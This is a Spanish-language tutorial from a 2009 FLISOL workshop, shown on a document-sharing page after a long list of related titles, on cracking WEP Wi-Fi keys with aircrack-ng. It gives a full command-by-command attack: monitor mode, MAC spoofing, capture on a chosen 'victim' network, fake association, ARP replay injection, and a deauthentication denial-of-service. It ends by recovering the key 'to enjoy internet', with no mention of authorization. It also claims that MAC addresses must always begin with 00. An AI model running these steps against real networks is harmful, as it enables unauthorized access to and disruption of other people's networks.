TUTORIAL DE AIRCRACK-NG



Documentos relacionados
TUTORIAL DE AIRCRACK-NG

WEP, WPA/WPA2 Cracking

ASALTANDO REDES WI-FI WEP / WPA

Instalación/configuración servicio VTUN

Cómo crear una Red PAN Windows Linux

Crackin WiFi networks with security enabled

EL ARTE DEL HACKING. Libro de Ethical Hacking para entrenamiento sobre ataques informáticos. Contacto:

CONFIGURACIÓN DE LOS EQUIPOS PARA CONEXIÓN A LA RED INALÁMBRICA CON EL SISTEMA OPERATIVO LINUX

Guillermo López Leal, 2IM1 Introducción a la Seguridad Universidad Nebrija

Conexión a la VPN de UGR desde. GNU/Linux

INSTALACIÓN FIREWALL IPCOP

Guía de conexión a la red eduroam

Figura 1. Red de ejemplo para DHCP Server

Guía de conexión a la red eduroam

Guía de Instalación del servicio de BackupOnline de Idecnet. Indice

Acá vamos a ocuparnos de cómo realizar la instalación de una red intra-aula sobre Linux, concretamente en la distribución de GNU/Linux Ubuntu 9.04.

COMO CONFIGURAR UNA MAQUINA VIRTUAL EN VIRTUALBOX PARA ELASTIX

Programa diseñado y creado por Art-Tronic Promotora Audiovisual, S.L.

UNIVERSIDAD DE ALCALÁ - DEPARTAMENTO DE AUTOMÁTICA Área de Ingeniería Telemática LABORATORIO DE COMUNICACIÓN DE DATOS (CURSO 2011/2012)

Manual instalación Windows 8. Instalar Windows 8 paso a paso

Configuración de la red

5.2.- Configuración de un Servidor DHCP en Windows 2003 Server

Firewall Firestarter. Establece perímetros confiables.

Guía rápida de instalación Kit Router ADSL

MANUAL DE ASIGNACIÓN DE NOMBRES DE EQUIPOS E INSTALACIÓN DE AGENTE DE MONITOREO DE HARDWARE, SOFTWARE OSC INVENTORY PARA SISTEMA OPERATIVO UBUNTU

MANUAL DE USUARIO DE UNIFIED IM

Seguidamente se muestra una pantalla para seleccionar nuestra localización, y comprobamos que la hora y demás es correcto. Podemos hacerlo fácilmente

Los sistemas operativos

Cómo capturar páginas web con el programa GNU Wget

Redes de área local Aplicaciones y Servicios Linux VNC

Pitivi Serafín Vélez Barrera Breve manual de PITIVI

GTK-RecordMyDesktop Serafín Vélez Barrera Breve manual de GTK- RecordMyDesktop

Profesor: José Luis Di Biase

DDV: CLIENTE ESCRITORIO LINUX

PRACTICA 6.6 VPN Logmein Hamachi registrarse en la página instalación,

1. Configuración de una tarjeta de red en Linux Medidas de seguridad a configurar en el router...5

Creación Servidor FTP

Laboratorio de Redes y Sistemas Operativos Trabajo Práctico Final

Manual de Instalación Declaración y Liquidación Modelos

UNIDAD DIDACTICA 13 INICIAR SESIÓN EN LINUX DE FORMA REMOTA

PRÁCTICA 1-2: INSTALACIÓN Y ADMINISTRACIÓN DE UN SERVIDOR DNS (PRIMARIO Y ZONA DE RESOLUCIÓN DIRECTA E INVERSA EN WINDOWS 2008 SERVER)

Tesseract para el euskera

Instalación y Registro Versiones Educativas 2013

TUTORIAL DE INSTALACIÓN PARA VIRTUALBOX

BREVE INTRODUCCIÓN A IPSEC

Instalación de un servidor DHCP

CENTRO DE APOYO TECNOLÓGICO A EMPRENDEDORES, BILIB RECETA TECNOLÓGICA REALIZACIÓN DE COPIAS DE SEGURIDAD CON GSYNC

Introducción a las redes TCP/IP en Linux

The Ultimate Virtual Machine.

TEMA 7: Configuraciones básicas en red.

Ambos paquetes simplifican mucho la instalación del servidor en el equipo. Y ambos pueden ser utilizados para la creación de una red intra-aula.

Manual de EchoLink con Linux (Ubuntu)

CUPS Administración de impresora

Qué es una máquina virtual?

INSTALACIÓN DE UBUNTU SERVER 12.4 EN MÁQUINA VIRTUAL

Pasamos ahora a definir brevemente cual es el método de conexión más habitual usando un entorno gráfico.

Tutorial: Instalación de Eclipse para programar Android en Windows

T3-Rondas V 1.1. Help-Pc, S.L. C/ Pintor Pau Roig, 39 L Premià de Mar Barcelona Tel. (93) Fax marketing@t2app.

Tutorial DC++ Usarlo es muy sencillo y configurarlo también, aunque tiene algunos trucos importentes.

Instituto Tecnológico de Las Américas

TUTORIAL PARA CREAR UN SERVIDOR FTP

Tutorial: Primeros Pasos con Subversion

Servidor. Comenzaremos por confirmar que el servicio NFS esta instalado y ejecutandose desde la terminal, escribiremos lo siguiente: #rpm -q nfs-utils

Iptables, herramienta para controlar el tráfico de un servidor

Seguridad en redes inalámbricas. Vulnerabilidades del protocolo WEP

CENTRO DE TECNOLOGIA AVANZADA. Instalar Windows 7 desde cero paso a paso.

Un pequeñísimo tutorial para explicar cómo darse de alta al MEJOR SISTEMA de compartición, backup... en la web.

Curso de PHP con MySQL Gratis

Seguridad de la información: ARP Spoofing

Práctica3 - Analizadores de red: Wireshark y tcpdump.

Escudo Movistar Guía Rápida de Instalación Dispositivos Symbian

CATÁLOGO CATÁLOGO CATÁLOGO CATÁLOGO CATÁLOGO

GUÍA DE USUARIO: GOOGLE DRIVE

Configuración Servidor DHCP

MANUAL BASICO DE WEBEX

Auditoria Wireless. Cracking WEP & WPA keys. Jorge Luis Hernandez C. lesthack@gmail.com Linux/Aircrack

Guía Router NG-W710 y NG-W720 con Nuevo Firmware. Si aún no lo han actualizado, hacer Clic para descargar. Firmware NG-W710.

Software Libre y Software propietario

Configuración de un APs D-Link DWL-2100AP.-

INFORMACIÓN DEL SISTEMA. MONITORIZACIÓN

CURSO SOBRE LA PDi SMART USO DEL SOFTWARE NOTEBOOK.

Guía de diagnóstico Software WIRESHARK para la captura de tramas Ethernet Centro de Competencia Técnica

Puesta en marcha de tu Router Wi-Fi. Disfrutar de tu Internet ONO en cualquier parte nunca fue tan fácil

GUÍA PARA LA CONFIGURACIÓN DE ESTATIZACIÓN DE IP

Configuración de DNS seguros

Guía para arrancar en tu dispositivo ios aplicaciones desarrolladas en Xcode con una licencia universitaria.

Ubuntu Server HOW TO : SERVIDOR VPN. EN ESTE SE REALIZA LO SIGUIENTE: En este how to se le va a enseñar como usar vpn. Qué es una VPN?

PRACTICA DE REDES Punto de acceso Dlink

Tutorial: copia de seguridad (o imagen) de una partición con Clonezilla

Guía de uso del Cloud Datacenter de acens

MANUAL DE AYUDA MODULO TALLAS Y COLORES

PRACTICA DE REDES Redes Ad Hoc

1 MANUAL DE INSTALACIÓN

Configuración del servicio de printers CUPS

Ismael Briones Vilar ARP SPOOFING Espiando en redes segmentadas

INSTALAR UBUNTU DESDE WINDOWS

Cómo crear una máquina virtual?

Redes. Herramientas de red en GNU/Linux. Desactivar / activar bluetooth. rfkill block bluetooth. rfkill unblock bluetooth. Todas las interfaces de red

Tutorial como conectarse a una VPN utilizando OpenVPN

Instructivo para descarga del código fuente

Transcripción:

TUTORIAL DE AIRCRACK-NG Taller Realizado en FLISOL Los Ángeles Abril 25 de 2009.- Paolo Norambuena paolo.norambuena@gmail.com

AIRCRACK-NG Esta es una guía con fines educativos para el uso y manipulación de Aircrack-ng sobre las distintas distribuciones de Linux. Se explicará desde su instalación en sistemas como Mandriva, Ubuntu, Debian, OpenSuse y SlackWare para que posteriormente no existan dudas sobre ninguna distribución. En primer lugar debemos tener instalado en nuestro sistema el Driver del Fabricante de nuestra tarjeta de red, aircrack-ng no funciona con drivers emulados por ndiswrapper. Instalando Aircrack-ng En este apartado instalaremos aircrack-ng en las distintas distribuciones comenzando por Ubuntu. Ubuntu. $ sudo apt-get install aircrack-ng Mandriva # urpmi aircrack-ng OpenSUSE Descargar: ftp://ftp.pbone.net/mirror/packman.iu-bremen.de/suse/11.0/srpms/aircrack-ng-1.0rc3-0.pm.1.nosrc.rpm Instalar haciendo Doble Click al paquete una vez descargado.

SlackWare Descargar http://repository.slacky.eu/slackware-12.2/security/aircrack-ng/1.0rc3/aircrack-ng-1.0rc3- i486-1dd.tgz Una vez descargado por consola (terminal konsole, etc), ejecutar # installpkg aircrack-ng-1.0rc3-i486-1dd.tgz Paquetes complementarios. Una vez instalado aircrack-ng puede ser necesario la instalación de un paquete adicional por lo cual descargaremos IW, que es un complemento para poner nuestra tarjeta inalámbrica en modo monitor. según la distribución será necesario actualizar la librería libnl $ sudo apt-get install libnl1* (ubuntu, debian) # urpmi -a libnl (mandriva) Instalada y/o actualizada la librería procedemos a descargar iw. # wget http://wireless.kernel.org/download/iw/iw-0.9.13.tar.bz2 # tar jxvf iw-0.9.13.tar.bz2 # cd iw-0.9.13 # make #make install Y de esta forma ya tenemos aircrack-ng y su componente para poner en modo monitor nuestra wireless. Ahora solo nos queda empezar a crackear.

Crackeando redes. Ahora empezamos nuestro trabajo, lo que se realizó anteriormente solo se hace una vez, que es para instalar y configurar de buena forma nuestra suite, lo que se realiza siempre es lo que a continuación se detalla. Para quienes creen que cambiar su mac es necesario, pueden hacerlo asi macchanger -m 00:11:22:33:44:55 wlan0 Aviso: Las direcciones mac SIEMPRE deben iniciar con 00 Para saber cual es nuestra MAC debemos ejecutar #ifconfig (wlan0, eth1, etc) wlan0 Link encap:ethernet direcciónhw 00:11:22:33:44:55 inet dirección:192.168.1.2 Difusión:192.168.1.255 Máscara:255.255.255.0 dirección inet6: fe80::221:ff:fe84:490f/64 Alcance:Vínculo ARRIBA DIFUSIÓN CORRIENDO MULTICAST MTU:1500 Métrica:1 RX packets:107257 errors:0 dropped:0 overruns:0 frame:1442346 TX packets:85876 errors:6 dropped:0 overruns:0 carrier:0 colisiones:0 txqueuelen:1000 RX bytes:134605558 (134.6 MB) TX bytes:10380329 (10.3 MB) Interrupción:17 De la vista anterior podemos sacar nuestra dirección mac de direccionhw la serie numerica que acompaña la instrucción antes destacada es nuestra dirección, que utilizaremos desde ahora en adelante.

Airmon-ng. Airmon-ng es parte de la suite de aircrack-ng la cual permite crear la interfaz mon0 en modo monitor. Su utilización es la siguiente # airmon-ng start wlan0 (o el nombre de la interfaz que puede ser wlan0, eth1, etc) En caso de que nos muestre un error podemos utilizar iw que instalamos anteriormente. # iw dev wlan0 interface add mon0 type monitor Ya tenemos el primer paso completo. Airodump-ng # airodump-ng mon0 De esta forma veremos todas las redes disponibles con sus respectivos canales, una vez que ya decidimos que redes son las que vamos a atacar creamos un filtro, paramos la ejecución de airodump-ng presionando Ctrl + C, y posteriormente ejecutamos:

-c = Filtro de canal 6, 11, 1, etc. -w = Escribir resultados en un documento. # airodump-ng -c 11 -w nombre mon0 De esta forma hemos creado un filtro que solo trabajará en el canal indicado (11).

Aireplay-Ng Una vez que airodump-ng ya está trabajando, abrimos una nueva consola donde empezaremos a trabajar con aireplay-ng. Lo primero que debemos hacer con aireplay-ng es asociarnos a la red a la cual atacaremos. #aireplay-ng -1 6000 -q 10 -o 1 -e (ESSID victima) -a (Mac Victima) -h (nuestra mac) mon0 O #aireplay-ng -1 6 -q 10 -o 1 -e-e (ESSID victima) -a (Mac Victima) -h (nuestra mac) mon0 18:22:32 Sending Authentication Request 18:22:32 Authentication successful 18:22:32 Sending Association Request 18:22:32 Association successful :-) 18:22:42 Sending keep-alive packet 18:22:52 Sending keep-alive packet Creo que muchos se pueden preguntar, de donde obtengo el ESSID y la Mac de la víctima?. Bueno, si recordamos en la consola anterior ejecutamos airodump-ng, de esa pantalla encontramos las columnas BSSID y ESSID que corresponden a la mac y la ESSID o nombre del router respectivamente. De esta forma estaremos asociados a la red la cual cada 10 segundos aireplay-ng mandará un paquete llamado KEEP-ALIVE, lo que avisará al router que seguimos asociados y asi no nos botará a cada rato.

Ya asociados procedemos a enviar y capturar paquetes, para eso en una nueva consola ejecutaremos nuevamente aireplay-ng pero en modo agresivo. #aireplay-ng -3 -b (Mac Víctima) -h (nuestra mac) mon0 De la imagen anterior lo que nos interesa es que aumenten los ARP, ya que son esos los paquetes capturados y los que además nos entregarán la clave buscada. Una vez que tenemos desde 150.000 paquetes capturados empezamos a trabajar con aircrack-ng. Nunca está demás recordar que mientras mas paquetes capturados, es mucho mejor, ya que más pronto obtendremos la clave. En caso de que este ataque no capture paquetes ARP, es decir, despues de un largo periodo de tiempo, podemos realizar un Ataque DoS (Denegación de Servicios), para realizar este ataque es necesario simplemente saber la dirección Mac del Router, dato que por lo demás, hemos utilizado para cada acción con aircrack-ng y sus componentes.

Ahora Como realizamos el ataque DoS con aircrack-ng? R: // #aireplay-ng -0 0 -a (Mac Router) mon0 Con eso ya estaríamos acelerando la transferencia y captura de paquetes. Aircrack-Ng Ya estamos en el paso final, con los paquetes de datos capturados procedemos a ejecutar aircrack-ng, para lo cual tenemos dos formas, una lenta pero efectiva, y una rápida pero se necesita una mayor cantidad de paquetes para desencriptar la clave. Forma lenta #aircrack-ng *.cap Forma Rápida (se necesita mayor cantidad de paquetes capturados) #aircrack-ng -z *.cap

De esta forma ya hemos desencriptado la clave que buscabamos, ahora a disfrutar de internet. Recordatorio. Al finalizar este tutorial, cabe recordar que la distancia afecta nuestro trabajo, si estamos muy lejos de la red a atacar la transferencia y captura de paquetes será muy lenta llegando incluso a ser nula. Por lo cual es recomendable estar a una distancia prudente para poder realizar la captura de forma rápida. Los drivers para las tarjetas inalambricas deben ser los propietarios, no se puede realizar por emulación de drivers, en este caso con ndiswrapper, por ejemplo. Las acciones deben ser ejecutadas como Super Usuario (root) en los sistemas que lo permitan, en caso de Ubuntu, se debe ejecutar con sudo. Las direcciones mac SIEMPRE deben iniciar con 00 en caso de que las cambien en forma manual. Si no aireplay-ng no inyecta ni captura paquetes, realizamos un ataque DoS con aireplay #aireplay-ng -0 0 -a (Mac Router) mon0 Todo lo que tenga # en Ubuntu se debe ejecutar con sudo. Finalizando. Espero que este tutorial sea de utilidad para cada persona que lo lea. Este tutorial está enfocado en una forma de ataque, en aircrack-ng existen muchos otros métodos, algunos más complicados que otros, pero la idea es aprender y adoptar la forma más cómoda para cada uno. Agradecimientos Aníbal Chavo Zapata, por la instrucción de ataque DoS. En caso de duda, contactar a paolo.norambuena@gmail.com